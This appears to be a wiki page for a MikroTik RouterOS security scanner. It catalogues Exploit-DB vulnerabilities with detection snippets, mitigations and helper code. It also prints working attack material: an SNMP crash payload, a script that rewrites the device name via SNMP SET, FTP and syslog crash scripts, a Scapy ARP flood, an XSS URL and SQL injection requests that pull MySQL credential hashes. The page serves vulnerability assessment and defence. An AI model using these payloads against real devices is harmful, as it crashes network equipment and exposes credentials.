EDB Exploit Coverage - mrhenrike/MikrotikAPI-BF GitHub Wiki

EDB Exploit Coverage — Exploit-DB Mikrotik PoC Exploits

All 19 Mikrotik-related Exploit-DB entries plus 81 additional CVE/config-audit exploit classes (100 total database entries, 97 executable exploit classes) are implemented in MikrotikAPI-BF as detection-only PoC classes.
All checks are non-destructive — no crash payloads are sent in automated mode.


Quick Reference

# Run full CVE + EDB scan (includes all 100 exploit classes)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P yourpass

# Run a specific exploit by CVE/EDB ID (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2018-14847

# Run 8-phase audit with SARIF output (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P yourpass --export sarif

# Run a single EDB exploit class programmatically
python - <<'EOF'
from xpl.exploits import EXPLOIT_REGISTRY
e = EXPLOIT_REGISTRY['EDB-31102']('192.168.1.1', timeout=5)
print(e.check())
EOF

Exploit Classes (EDB series)

EDB-31102 — RouterOS 3.x SNMP SET Denial of Service

EDB Verified: Yes | Author: ShadOS | Date: 2008-02-04
Affects: RouterOS ≤ 3.2
Type: Hardware / DoS
Protocol: SNMP UDP/161

Description:
A crafted SNMP SET packet sent to RouterOS ≤ 3.2 crashes the SNMPd daemon.
The original C exploit (by ShadOS) uses raw sockets with a spoofed source IP and an SNMP SET BER payload that triggers an out-of-bounds write in the SNMPd.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_31102
e = Exploit_EDB_31102('192.168.1.1', timeout=5)
print(e.check())
EOF

Crash payload from the original C PoC (EDB-31102; the detection class never sends it):

// evilcode[] triggers the crash in RouterOS SNMPd ≤ 3.2
char evilcode[] = {
    0x19,0x02,0x02,0x1e,0x0c,0x02,0x01,0x00,
    0x02,0x01,0x00,0x30,0x0d,0x30,0x0b,0x06,
    0x07,0x01,0x00,0x01,0x00,0x01,0x00,0x00,
    0x05,0x00,0x00
};
// Usage: ./snmpdos -s <source> -d <target> -c <community>

Mitigation: Disable SNMP or upgrade to RouterOS 3.3+.
Reference: https://www.exploit-db.com/exploits/31102


EDB-6366 — RouterOS 3.13 SNMP Unauthorized Write (Set Request)

EDB Verified: Yes | Author: ShadOS | Date: 2008-09-05 | CVE-2008-6976
Affects: RouterOS 2.9.51, ≤ 3.13
Type: Hardware / Remote
Protocol: SNMP UDP/161

Description:
MikroTik documented SNMP as read-only (GET/GetNext only), but RouterOS ≤ 3.13 accepts and processes SNMP SET requests — allowing an unauthenticated attacker to overwrite system identity and potentially other OIDs.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_6366
e = Exploit_EDB_6366('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Python equivalent):

import socket

def snmp_set_identity(target, community="public"):
    # SNMPv1 SetRequest: OID 1.3.6.1.2.1.1.5.0 (sysName.0) = "hacked".
    # BER lengths: message body = 0x29 + len(community); SetRequest PDU = 0x22;
    # VarBindList = 0x14; VarBind = 0x12 (community must stay under 87 bytes so
    # every length still fits the short form).
    payload = bytes([
        0x30, 0x29 + len(community), 0x02,0x01,0x00,          # SEQUENCE, version 0 (v1)
        0x04, len(community)] + list(community.encode()) + [   # community string
        0xa3,0x22, 0x02,0x04,0x01,0x02,0x03,0x04,              # SetRequest, request-id
        0x02,0x01,0x00, 0x02,0x01,0x00,                        # error-status, error-index
        0x30,0x14, 0x30,0x12,                                  # VarBindList, VarBind
        0x06,0x08, 0x2b,0x06,0x01,0x02,0x01,0x01,0x05,0x00,    # OID sysName.0
        0x04,0x06, 0x68,0x61,0x63,0x6b,0x65,0x64               # OCTET STRING "hacked"
    ])
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, (target, 161))
    sock.close()

Reference: https://www.exploit-db.com/exploits/6366
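The following is an added example, not code from MikrotikAPI-BF or from the original PoC: it is the minimal-impact counterpart of the SET payload above. It encodes SNMPv1 BER by hand, reads sysName.0 with a GetRequest and then sends a SetRequest carrying exactly the value it just read, so a noError response proves the agent accepts writes (the EDB-6366 condition) while device state stays unchanged. Caveat: it still emits a SET, which the project's read-only classes do not, so treat it as an opt-in step. The community string, the 2-byte request-id and the sample response are assumptions constructed for the example.

```python
import socket

# Added example (not MikrotikAPI-BF code): minimal-impact SNMPv1 write probe.
# GET sysName.0, then SET it to the SAME value; error-status 0 on the SET means
# the agent honours writes (EDB-6366) without anything on the device changing.

SYSNAME_OID = "1.3.6.1.2.1.1.5.0"

def tlv(tag, body):
    """BER TLV with short-form length (probes of this size never exceed 127 bytes)."""
    assert len(body) < 128, "short-form length only"
    return bytes([tag, len(body)]) + body

def oid_bytes(dotted):
    """Encode a dotted OID: first two arcs pack as 40*a+b, remaining arcs are < 128 here."""
    arcs = [int(a) for a in dotted.split(".")]
    assert all(a < 128 for a in arcs[2:]), "multi-byte arcs not handled"
    return bytes([40 * arcs[0] + arcs[1]] + arcs[2:])

def snmp_msg(pdu_tag, community, oid, value_tlv, req_id=0x0102, error_status=0):
    """SNMPv1 message with one VarBind. pdu_tag: 0xa0 GetRequest, 0xa2 GetResponse, 0xa3 SetRequest."""
    varbind = tlv(0x30, tlv(0x06, oid_bytes(oid)) + value_tlv)
    pdu = tlv(pdu_tag,
              tlv(0x02, req_id.to_bytes(2, "big"))      # request-id (assumed 2-byte value)
              + tlv(0x02, bytes([error_status]))         # error-status
              + tlv(0x02, b"\x00")                       # error-index
              + tlv(0x30, varbind))                      # VarBindList
    return tlv(0x30, tlv(0x02, b"\x00")                  # version 0 = SNMPv1
                     + tlv(0x04, community.encode())
                     + pdu)

def build_get(community, oid):
    return snmp_msg(0xa0, community, oid, tlv(0x05, b""))      # NULL placeholder value

def build_set(community, oid, value):
    return snmp_msg(0xa3, community, oid, tlv(0x04, value))     # OCTET STRING value

def parse_tlv(buf, pos=0):
    """Return (tag, body, next_pos); long-form lengths are handled for larger responses."""
    tag, length = buf[pos], buf[pos + 1]
    if length & 0x80:
        n = length & 0x7f
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        pos += n
    return tag, buf[pos + 2:pos + 2 + length], pos + 2 + length

def parse_response(data):
    """Return (error_status, value_bytes) from a GetResponse; raises on any other PDU."""
    _, msg, _ = parse_tlv(data)
    _, _, p = parse_tlv(msg)            # version
    _, _, p = parse_tlv(msg, p)         # community
    pdu_tag, pdu, _ = parse_tlv(msg, p)
    if pdu_tag != 0xa2:
        raise ValueError(f"unexpected PDU tag 0x{pdu_tag:02x}")
    _, _, p = parse_tlv(pdu)            # request-id
    _, err, p = parse_tlv(pdu, p)       # error-status (0 = noError)
    _, _, p = parse_tlv(pdu, p)         # error-index
    _, vbl, _ = parse_tlv(pdu, p)       # VarBindList
    _, vb, _ = parse_tlv(vbl)           # first VarBind
    _, _, p = parse_tlv(vb)             # OID
    _, value, _ = parse_tlv(vb, p)      # value
    return int.from_bytes(err, "big"), value

def check_snmp_write(target, community="public", timeout=3.0):
    """Network probe (not exercised offline); result dict mirrors the check() shape used on this page."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get(community, SYSNAME_OID), (target, 161))
        try:
            err, current = parse_response(s.recv(2048))
        except socket.timeout:
            return {"vulnerable": False, "evidence": "no SNMP GET response (closed/filtered)"}
        if err != 0:
            return {"vulnerable": False, "evidence": f"GET error-status={err}"}
        s.sendto(build_set(community, SYSNAME_OID, current), (target, 161))  # same value back
        try:
            err, _ = parse_response(s.recv(2048))
        except socket.timeout:
            return {"vulnerable": False, "evidence": "SET silently dropped"}
        return {"vulnerable": err == 0,
                "evidence": f"SET sysName.0 error-status={err}, sysName={current!r}"}

# Constructed sample GetResponse (not captured from a device) so the parser runs offline:
# error-status 0, sysName.0 = "MikroTik".
SAMPLE_RESPONSE = snmp_msg(0xa2, "public", SYSNAME_OID, tlv(0x04, b"MikroTik"))
```

An agent that rejects the SET answers with a non-zero error-status (noSuchName or readOnly for SNMPv1), and a firewalled or disabled SNMP service produces a timeout on the GET, so the three outcomes are distinguishable without any crash payload.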


EDB-44283 / EDB-44284 — 'Chimay Red' Stack Clash RCE

Author: Lorenzo Santina | Date: 2018-03-12
Affects: RouterOS < 6.38.4 (MIPSBE: EDB-44283, x86/CHR: EDB-44284)
Type: Hardware / Pre-Auth RCE
Protocol: HTTP TCP/80

Description:
The www HTTP service in RouterOS < 6.38.4 is vulnerable to a Stack Clash attack that allows pre-authenticated remote code execution. Two PoCs exist for different CPU architectures.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_44283_44284
e = Exploit_EDB_44283_44284('192.168.1.1', timeout=10)
print(e.check())
EOF

Full PoC: https://github.com/BigNerd95/Chimay-Red

Mitigation: Upgrade to RouterOS 6.38.4+; disable www service if not needed.
References: https://www.exploit-db.com/exploits/44283 (MIPSBE), https://www.exploit-db.com/exploits/44284 (x86)


EDB-44450 — MikroTik 6.41.4 FTP Daemon Denial of Service

Author: FarazPajohan | Date: 2018-04-13
Affects: RouterOS 6.41.4 FTP service
Type: Hardware / DoS
Protocol: FTP TCP/21

Description:
The FTP daemon in RouterOS 6.41.4 crashes when it receives an excessively long username string during the authentication handshake.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_44450
e = Exploit_EDB_44450('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Python):

import ftplib
ftp = ftplib.FTP(timeout=5)
ftp.connect('192.168.1.1', 21)
try:
    ftp.login(user='A' * 500, passwd='')  # triggers crash on 6.41.4
except Exception as e:
    print(f"Response: {e}")

Mitigation: Disable FTP service or upgrade to 6.41.5+.
Reference: https://www.exploit-db.com/exploits/44450


EDB-43317 — MikroTik 6.40.5 ICMP Denial of Service

Author: FarazPajohan | Date: 2017-12-11
Affects: RouterOS 6.40.5 exactly
Type: Hardware / DoS
Protocol: ICMP

Description:
A crafted ICMP flood causes a DoS condition on RouterOS 6.40.5.

Detection (version check):

python - <<'EOF'
from xpl.exploits import Exploit_EDB_43317
e = Exploit_EDB_43317('192.168.1.1', timeout=5, username='admin', password='pass')
print(e.check())
EOF

Reference: https://www.exploit-db.com/exploits/43317


EDB-41752 — RouterBoard 6.38.5 Denial of Service

Author: FarazPajohan | Date: 2017-03-28
Affects: RouterOS 6.38.5
Type: Hardware / DoS

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_41752
e = Exploit_EDB_41752('192.168.1.1', timeout=5, username='admin', password='pass')
print(e.check())
EOF

Reference: https://www.exploit-db.com/exploits/41752
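The detection classes for EDB-41752, EDB-43317 and EDB-44450 above are version checks against the listed "Affects" ranges. As an added example, not the project's own code, the block below turns those "Affects:" strings into a comparable version table and evaluates a version string obtained without sending any payload (the API /system/resource version field, the FTP 220 banner, or a sysDescr string). It also handles the edge case where a protocol banner such as "SSH-2.0-ROSSSH" contains a version number that is not a RouterOS version. The banner formats and the VERSION_CHECKS table are assumptions built from this page.

```python
import operator
import re

# Added example (not MikrotikAPI-BF code): evaluate the "Affects:" ranges of the EDB
# sections above against a version string taken from a non-destructive source.

# Version tokens: 6.38.4, 6.38, 6.38rc3. Release candidates sort below the final release.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?")
_SSH_PREFIX_RE = re.compile(r"^SSH-\d\.\d-")   # "SSH-2.0-ROSSSH": 2.0 is the protocol, not RouterOS
_SPEC_RE = re.compile(r"(<=|>=|==|<|>)?\s*(\d[\w.]*)")
_OPS = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
        ">=": operator.ge, ">": operator.gt}
_FINAL = 10 ** 6                               # rc slot used for a non-rc release

def parse_version(text):
    """Return (major, minor, patch, rc) or None when no RouterOS-style version is present."""
    text = _SSH_PREFIX_RE.sub("", text)
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch or 0), int(rc) if rc else _FINAL)

def affected(version, spec):
    """spec is a comma-separated list of clauses such as '<= 3.13', '< 6.38.4' or a bare
    version meaning exact match; the device is affected if any clause matches."""
    spec = spec.replace("≤", "<=").replace("≥", ">=")
    for clause in spec.split(","):
        m = _SPEC_RE.search(clause)
        if not m:
            continue
        op = m.group(1) or "=="
        bound = parse_version(m.group(2))
        if bound is not None and _OPS[op](version, bound):
            return True
    return False

# Constructed from the "Affects:" lines of the EDB sections above (assumed to be the
# whole condition; the project's own classes may apply further checks).
VERSION_CHECKS = {
    "EDB-31102": "<= 3.2",
    "EDB-6366": "2.9.51, <= 3.13",
    "EDB-44283/44284": "< 6.38.4",
    "EDB-41752": "6.38.5",
    "EDB-43317": "6.40.5",
    "EDB-44450": "6.41.4",
}

def version_hits(text, checks=VERSION_CHECKS):
    """IDs whose version condition the given banner/version string satisfies."""
    v = parse_version(text)
    if v is None:
        return []
    return sorted(eid for eid, spec in checks.items() if affected(v, spec))

if __name__ == "__main__":
    # Constructed sample inputs (not captured from real devices).
    for sample in ("6.40.5 (stable)",
                   "220 MikroTik FTP server (MikroTik 6.41.4) ready",
                   "SSH-2.0-ROSSSH",
                   "6.38rc3"):
        print(f"{sample!r:55} -> {version_hits(sample)}")
```

A version-only verdict is an indicator, not proof: a patched branch build or a disabled service leaves the version in range while the bug is unreachable, which is why the page's classes pair version checks with service probes where they can.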


EDB-41601 — MikroTik Router ARP Table Overflow DoS

Author: FarazPajohan | Date: 2017-03-05
Affects: Multiple RouterOS versions (L2 attack)
Type: Hardware / DoS
Requirement: Must be on the same Layer-2 segment

Description:
Flooding the router with ARP requests fills the ARP table causing a DoS. Requires L2 adjacency.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_41601
e = Exploit_EDB_41601('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Scapy — do not run without authorization):

from scapy.all import ARP, Ether, RandIP, sendp
import random

def arp_flood(target_ip, sender_net="192.168.1.0/24", iface="eth0", count=10000):
    """Send ARP requests from random sender MAC/IP pairs. The router learns one
    dynamic ARP entry per sender pair, so both fields must vary; with Scapy's
    defaults hwsrc/psrc would be the attacker's own address in every packet."""
    for _ in range(count):
        fake_mac = ":".join(f"{random.randint(0,255):02x}" for _ in range(6))
        pkt = (Ether(src=fake_mac, dst="ff:ff:ff:ff:ff:ff")
               / ARP(op=1, hwsrc=fake_mac, psrc=str(RandIP(sender_net)), pdst=target_ip))
        sendp(pkt, iface=iface, verbose=False)

Mitigation: cap dynamic neighbor entries (/ip settings set max-neighbor-entries=<limit>), use static ARP on exposed segments (interface arp=reply-only with static entries), and rate-limit ARP with bridge filter rules (IP firewall rules do not see ARP).
Reference: https://www.exploit-db.com/exploits/41601


EDB-28056 — RouterOS ROSSSH sshd Remote Heap Corruption

Author: kingcope | Date: 2013-09-03
Affects: RouterOS with ROSSSH SSH daemon (multiple versions)
Type: Hardware / Remote
Protocol: SSH TCP/22

Description:
The MikroTik RouterOS SSH daemon (ROSSSH) is vulnerable to a remote heap corruption bug triggered by sending malformed SSH2_MSG_KEXINIT packets during the key exchange phase.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_28056
e = Exploit_EDB_28056('192.168.1.1', timeout=5)
print(e.check())
EOF

PoC (Python — detection only):

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(('192.168.1.1', 22))
banner = sock.recv(256).decode(errors='replace')
print(f"SSH Banner: {banner}")
# ROSSSH banners contain "ROSSSH" or "RosSsh"
is_rosssh = 'rosssh' in banner.lower()
print(f"ROSSSH detected: {is_rosssh}")
sock.close()

Reference: https://www.exploit-db.com/exploits/28056


EDB-24968 — Mikrotik Syslog Server for Windows 1.15 — Remote BoF DoS

EDB Verified: Yes | Author: xis_one | Date: 2013-04-22
Affects: Mikrotik Syslog Server for Windows v1.15 (MT_Syslog.exe)
Type: Windows Application / DoS
Protocol: Syslog UDP/514
NOTE: This targets the Windows collector application, NOT RouterOS firmware.

Description:
MT_Syslog.exe v1.15 crashes when it receives a UDP/514 syslog message larger than its receive buffer: the resulting WSAEMSGSIZE socket error is not handled, so a single oversized datagram is enough.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_24968
e = Exploit_EDB_24968('192.168.1.1', timeout=5)
print(e.check())
EOF

Original PoC, run method only (Metasploit Ruby, EDB-24968):

require 'msf/core'
# Module: auxiliary, includes Msf::Exploit::Remote::Udp, Msf::Auxiliary::Dos
def run
  connect_udp
  pkt = "<0>" + "Apr19 " + "10.0.0.2 " + "badass" + ": " + "A"*5000
  udp_sock.put(pkt)
  disconnect_udp
end

Python equivalent:

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pkt = ("<0>Apr19 10.0.0.2 badass: " + "A"*5000).encode()
sock.sendto(pkt, ('192.168.1.1', 514))  # crashes MT_Syslog.exe 1.15

Vulnerable app: https://www.exploit-db.com/apps/2d91984cebb7d4a9b6c156e3062c6843-MT_Syslog.exe
Reference: https://www.exploit-db.com/exploits/24968


EDB-18817 — Mikrotik Router Generic Denial of Service

Author: PoURaN | Date: 2012-05-01
Affects: Multiple RouterOS versions
Type: Hardware / DoS

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_18817
e = Exploit_EDB_18817('192.168.1.1', timeout=5)
print(e.check())
EOF

Reference: https://www.exploit-db.com/exploits/18817


EDB-52366 — RouterOS 7.19.1 WebFig Reflected XSS

Author: Prak Sokchea | Date: 2025-07-16
Affects: RouterOS 7.19.1 WebFig web interface
Type: Multiple / Remote / XSS
Protocol: HTTP TCP/80

Description:
The WebFig interface in RouterOS 7.19.1 reflects user-supplied input in error messages without proper HTML encoding, enabling reflected XSS.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_52366
e = Exploit_EDB_52366('192.168.1.1', timeout=5)
print(e.check())
EOF

PoC URL (a logged-in WebFig admin has to open the link; nothing executes without that click):

http://<router>/index.html?"><img/src=x onerror=alert(document.cookie)>

Reference: https://www.exploit-db.com/exploits/52366
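As an added example (not MikrotikAPI-BF code), the block below shows a detection-only probe for this class of reflected XSS: it injects a random marker containing the characters that must be HTML-encoded, then classifies whether the response reflects them verbatim, entity-encoded, or not at all. The random marker avoids false positives from static page text that happens to contain a quote or an angle bracket. The path, the bare-query injection point (taken from the PoC URL above) and the sample response bodies are assumptions constructed for the example.

```python
import html
import http.client
import secrets
import urllib.parse

# Added example (not MikrotikAPI-BF code): detection-only probe for reflected XSS of
# the EDB-52366 kind. A random marker wrapped in '"><' is sent and the response is
# classified by how it reflects the marker. No script runs and nothing is stored.

def make_marker():
    """Random token around '"><' so that existing page text cannot produce a hit."""
    tok = secrets.token_hex(4)
    return f'{tok}"><{tok}>'

def classify_reflection(body, marker):
    """'unencoded' if quote and angle brackets come back verbatim, 'encoded' if the
    marker is present only after entity decoding, 'absent' if it is not reflected."""
    if marker in body:
        return "unencoded"
    if marker in html.unescape(body):     # covers &quot;, &#34;, &gt; and friends
        return "encoded"
    return "absent"

def probe_reflected_xss(host, port=80, path="/index.html", timeout=5):
    """Network probe (not exercised offline). Mirrors the PoC URL above: the marker is
    sent as the bare query string of /index.html (the path is an assumption)."""
    marker = make_marker()
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", f"{path}?{urllib.parse.quote(marker, safe='')}")
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        status = resp.status
    finally:
        conn.close()
    verdict = classify_reflection(body, marker)
    return {"vulnerable": verdict == "unencoded",
            "evidence": f"HTTP {status}, marker reflection: {verdict}"}

# Constructed sample response bodies (not captured from a router) for the classifier.
MARKER = 'deadbeef"><deadbeef>'
VULNERABLE_BODY = '<p>Not found: deadbeef"><deadbeef></p>'
SAFE_BODY = '<p>Not found: deadbeef&quot;&gt;&lt;deadbeef&gt;</p>'
NO_REFLECT_BODY = '<p>Not found</p>'
```

The "encoded" verdict is worth reporting as well: it shows the input is reflected, which is the place to re-test after an upgrade, while "unencoded" is the only verdict that corresponds to the EDB-52366 finding.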


EDB-48474 — Mikrotik Router Monitoring System 1.2.3 SQL Injection

Author: jul10l1r4 | Date: 2020-05-18
Affects: Mikrotik Router Monitoring System web application v1.2.3 (third-party)
Type: WebApp / SQLi
NOTE: Targets a PHP web application, NOT RouterOS firmware.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_48474
e = Exploit_EDB_48474('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (GET-based):

GET /index.php?community=1+AND+1=0+UNION+SELECT+1,@@version,3,4,5,6--

Reference: https://www.exploit-db.com/exploits/48474


EDB-39817 — Web Interface for DNSmasq / Mikrotik — SQL Injection

Author: hyp3rlinx | Date: 2016-05-16
Affects: dns_dhcp web interface PHP app (third-party, uses RouterOS API)
Type: PHP WebApp / SQLi
NOTE: Targets a PHP web application frontend, NOT RouterOS firmware.

Description:
The net POST parameter in dns.php is directly concatenated into a MySQL query without sanitization, enabling error-based SQL injection to exfiltrate database credentials.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_39817
e = Exploit_EDB_39817('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (curl request, after hyp3rlinx's original):

curl -X POST http://<target>/dns_dhcp/dns/dns.php \
  -d "net=1 and (select 1 from(select count(*),concat((select (select concat(0x2b,host,0x2b,user,0x2b,password,0x2b)) from mysql.user limit 1),floor(rand(0)*2))x from mysql.user group by x)a)"
# Expected: "Duplicate entry '+root+*HASH+1' for key 'group_key'"

Vulnerable app: https://www.exploit-db.com/apps/7619a886f55b10bb474e7a71c11deee4-dns_dhcp.zip
Reference: https://www.exploit-db.com/exploits/39817


Running All EDB Exploits in One Pass

# Full automated scan including all EDB PoC exploit classes
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P yourpassword

# Export results to JSON
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P yourpass --export json --export-dir ./results

# Run all EDB exploits programmatically
from xpl.exploits import EXPLOIT_REGISTRY

target = "192.168.1.1"
edb_ids = [k for k in EXPLOIT_REGISTRY if k.startswith("EDB-")]

for eid in sorted(edb_ids):
    cls = EXPLOIT_REGISTRY[eid]
    try:
        result = cls(target, timeout=5, username="admin", password="pass").check()
    except Exception as exc:  # one unreachable service must not abort the whole pass
        print(f"[{eid}] check failed: {exc}")
        continue
    status = "VULNERABLE" if result["vulnerable"] else "not vulnerable"
    print(f"[{eid}] {result['title']}: {status}")
    if result.get("evidence"):
        print(f"  Evidence: {result['evidence'][:120]}")
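The loop above prints results; CI pipelines usually want them as SARIF instead (the tool's --export sarif does that natively). As an added example, not the project's exporter, the block below converts result dicts of the shape used above into a minimal SARIF 2.1.0 log: every exploit ID becomes a rule, only vulnerable findings become results, and the scanned host is recorded as the artifact location. The sample results and the mikrotik:// URI scheme are assumptions for the example.

```python
import json

# Added example (not MikrotikAPI-BF code; the tool's own --export sarif output may
# differ): convert check() result dicts ("vulnerable", "title", "evidence") into a
# SARIF 2.1.0 log that GitHub code scanning and most CI systems can ingest.

SARIF_SCHEMA = "https://json.schemastore.org/sarif-2.1.0.json"

def reference_url(eid):
    """Help link derived from the ID prefix (Exploit-DB or NVD); None for other IDs."""
    if eid.startswith("EDB-"):
        return f"https://www.exploit-db.com/exploits/{eid[4:]}"
    if eid.startswith("CVE-"):
        return f"https://nvd.nist.gov/vuln/detail/{eid}"
    return None

def results_to_sarif(target, results, tool_name="MikrotikAPI-BF", tool_version="3.10.0"):
    """results: {exploit_id: result_dict}. Every ID becomes a rule so the rule set is
    stable across scans; only vulnerable findings become results, so a clean scan
    yields an empty results list instead of 'not vulnerable' noise."""
    rules, findings = [], []
    for eid, r in sorted(results.items()):
        title = r.get("title", eid)
        rule = {"id": eid, "shortDescription": {"text": title}}
        if reference_url(eid):
            rule["helpUri"] = reference_url(eid)
        rules.append(rule)
        if r.get("vulnerable"):
            findings.append({
                "ruleId": eid,
                "level": "error",
                "message": {"text": f"{title}: {r.get('evidence', 'no evidence captured')}"},
                # Viewers expect a location; the scanned host stands in for a source
                # file (assumed URI scheme, not a SARIF convention).
                "locations": [{"physicalLocation": {
                    "artifactLocation": {"uri": f"mikrotik://{target}"}}}],
            })
    return {
        "$schema": SARIF_SCHEMA,
        "version": "2.1.0",
        "runs": [{
            "tool": {"driver": {"name": tool_name, "version": tool_version, "rules": rules}},
            "results": findings,
        }],
    }

def sarif_json(target, results):
    return json.dumps(results_to_sarif(target, results), indent=2)

# Constructed sample results (not from a real scan) in the check() dict shape.
SAMPLE_RESULTS = {
    "EDB-6366": {"title": "RouterOS SNMP Unauthorized Write", "vulnerable": True,
                 "evidence": "SET sysName.0 accepted (error-status=0)"},
    "EDB-28056": {"title": "ROSSSH Remote Heap Corruption", "vulnerable": False,
                  "evidence": "banner SSH-2.0-ROSSSH, version outside affected range"},
    "CVE-2018-14847": {"title": "Winbox Credential Disclosure", "vulnerable": False},
}

if __name__ == "__main__":
    print(sarif_json("192.168.1.1", SAMPLE_RESULTS))
```

Keeping the full rule list even on a clean scan lets a CI viewer show which checks ran, which matters for a detection-only tool whose absence of findings is the result being reported.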

Additional Exploit Classes (v3.7.0–v3.10.0)

Beyond the 19 EDB entries, MikrotikAPI-BF includes 28 additional exploit/audit classes added between v3.7.0 and v3.10.0; the tables below list a selection of them:

CVE-based (v3.7.0+)

ID                  Title                                          Type
CVE-2025-61481      WebFig HTTP Credential Exposure                Info Leak
CVE-2025-10948      REST API Stack Buffer Overflow RCE             RCE
CVE-2017-20149      RouterOS SMB Buffer Overflow                   DoS/RCE
CVE-2019-3981       RouterOS Relative Path Traversal               Info Leak
CVE-2020-5720       MikroTik WinBox Path Traversal                 Info Leak
CVE-2022-45313      MikroTik RouterOS Buffer Overflow              DoS
CVE-2025-6563       WireGuard Private Key Exposure via REST API    CWE-200

Config Audit (v3.7.0–v3.10.0)

ID                         Title                                   Type
MIKROTIK-CONFIG-003        SSRF via /rest/tool/fetch               SSRF
MIKROTIK-CONFIG-004        Scheduler Command Injection             RCE/Persistence
MIKROTIK-CONFIG-005        REST API Path Traversal Probe           Info Leak
MIKROTIK-JAILBREAK-001     SSH Backup Patch → devel user           Privilege Escalation
CVE-2018-14847-DECRYPT     Winbox Credential Decryption            Info Leak

8-Phase Auditor (v3.10.0)

The --audit flag runs an integrated 8-phase security audit covering:

  1. System enumeration
  2. Service mapping
  3. Credential audit
  4. Injection testing
  5. Winbox probing
  6. SNMP analysis
  7. Debug endpoints
  8. Firewall audit

Notes on Scope

Category                                                   Coverage
RouterOS firmware exploits                                 ✓ Full (97 classes, 100 DB entries)
Windows companion apps (MT_Syslog.exe)                     ✓ Detection
Third-party PHP web interfaces (dns_dhcp, monitoring app)  ✓ Detection
Layer-2 / MAC-Telnet attacks                               ✓ Full (requires L2 adjacency)
REST API injection/audit                                   ✓ Full (v3.10.0+)
SARIF CI/CD output                                         ✓ Full (v3.10.0+)

All detection classes are read-only by design — they probe for vulnerability indicators without modifying device state or causing crashes.
Use only on systems you own or have explicit written authorization to test.
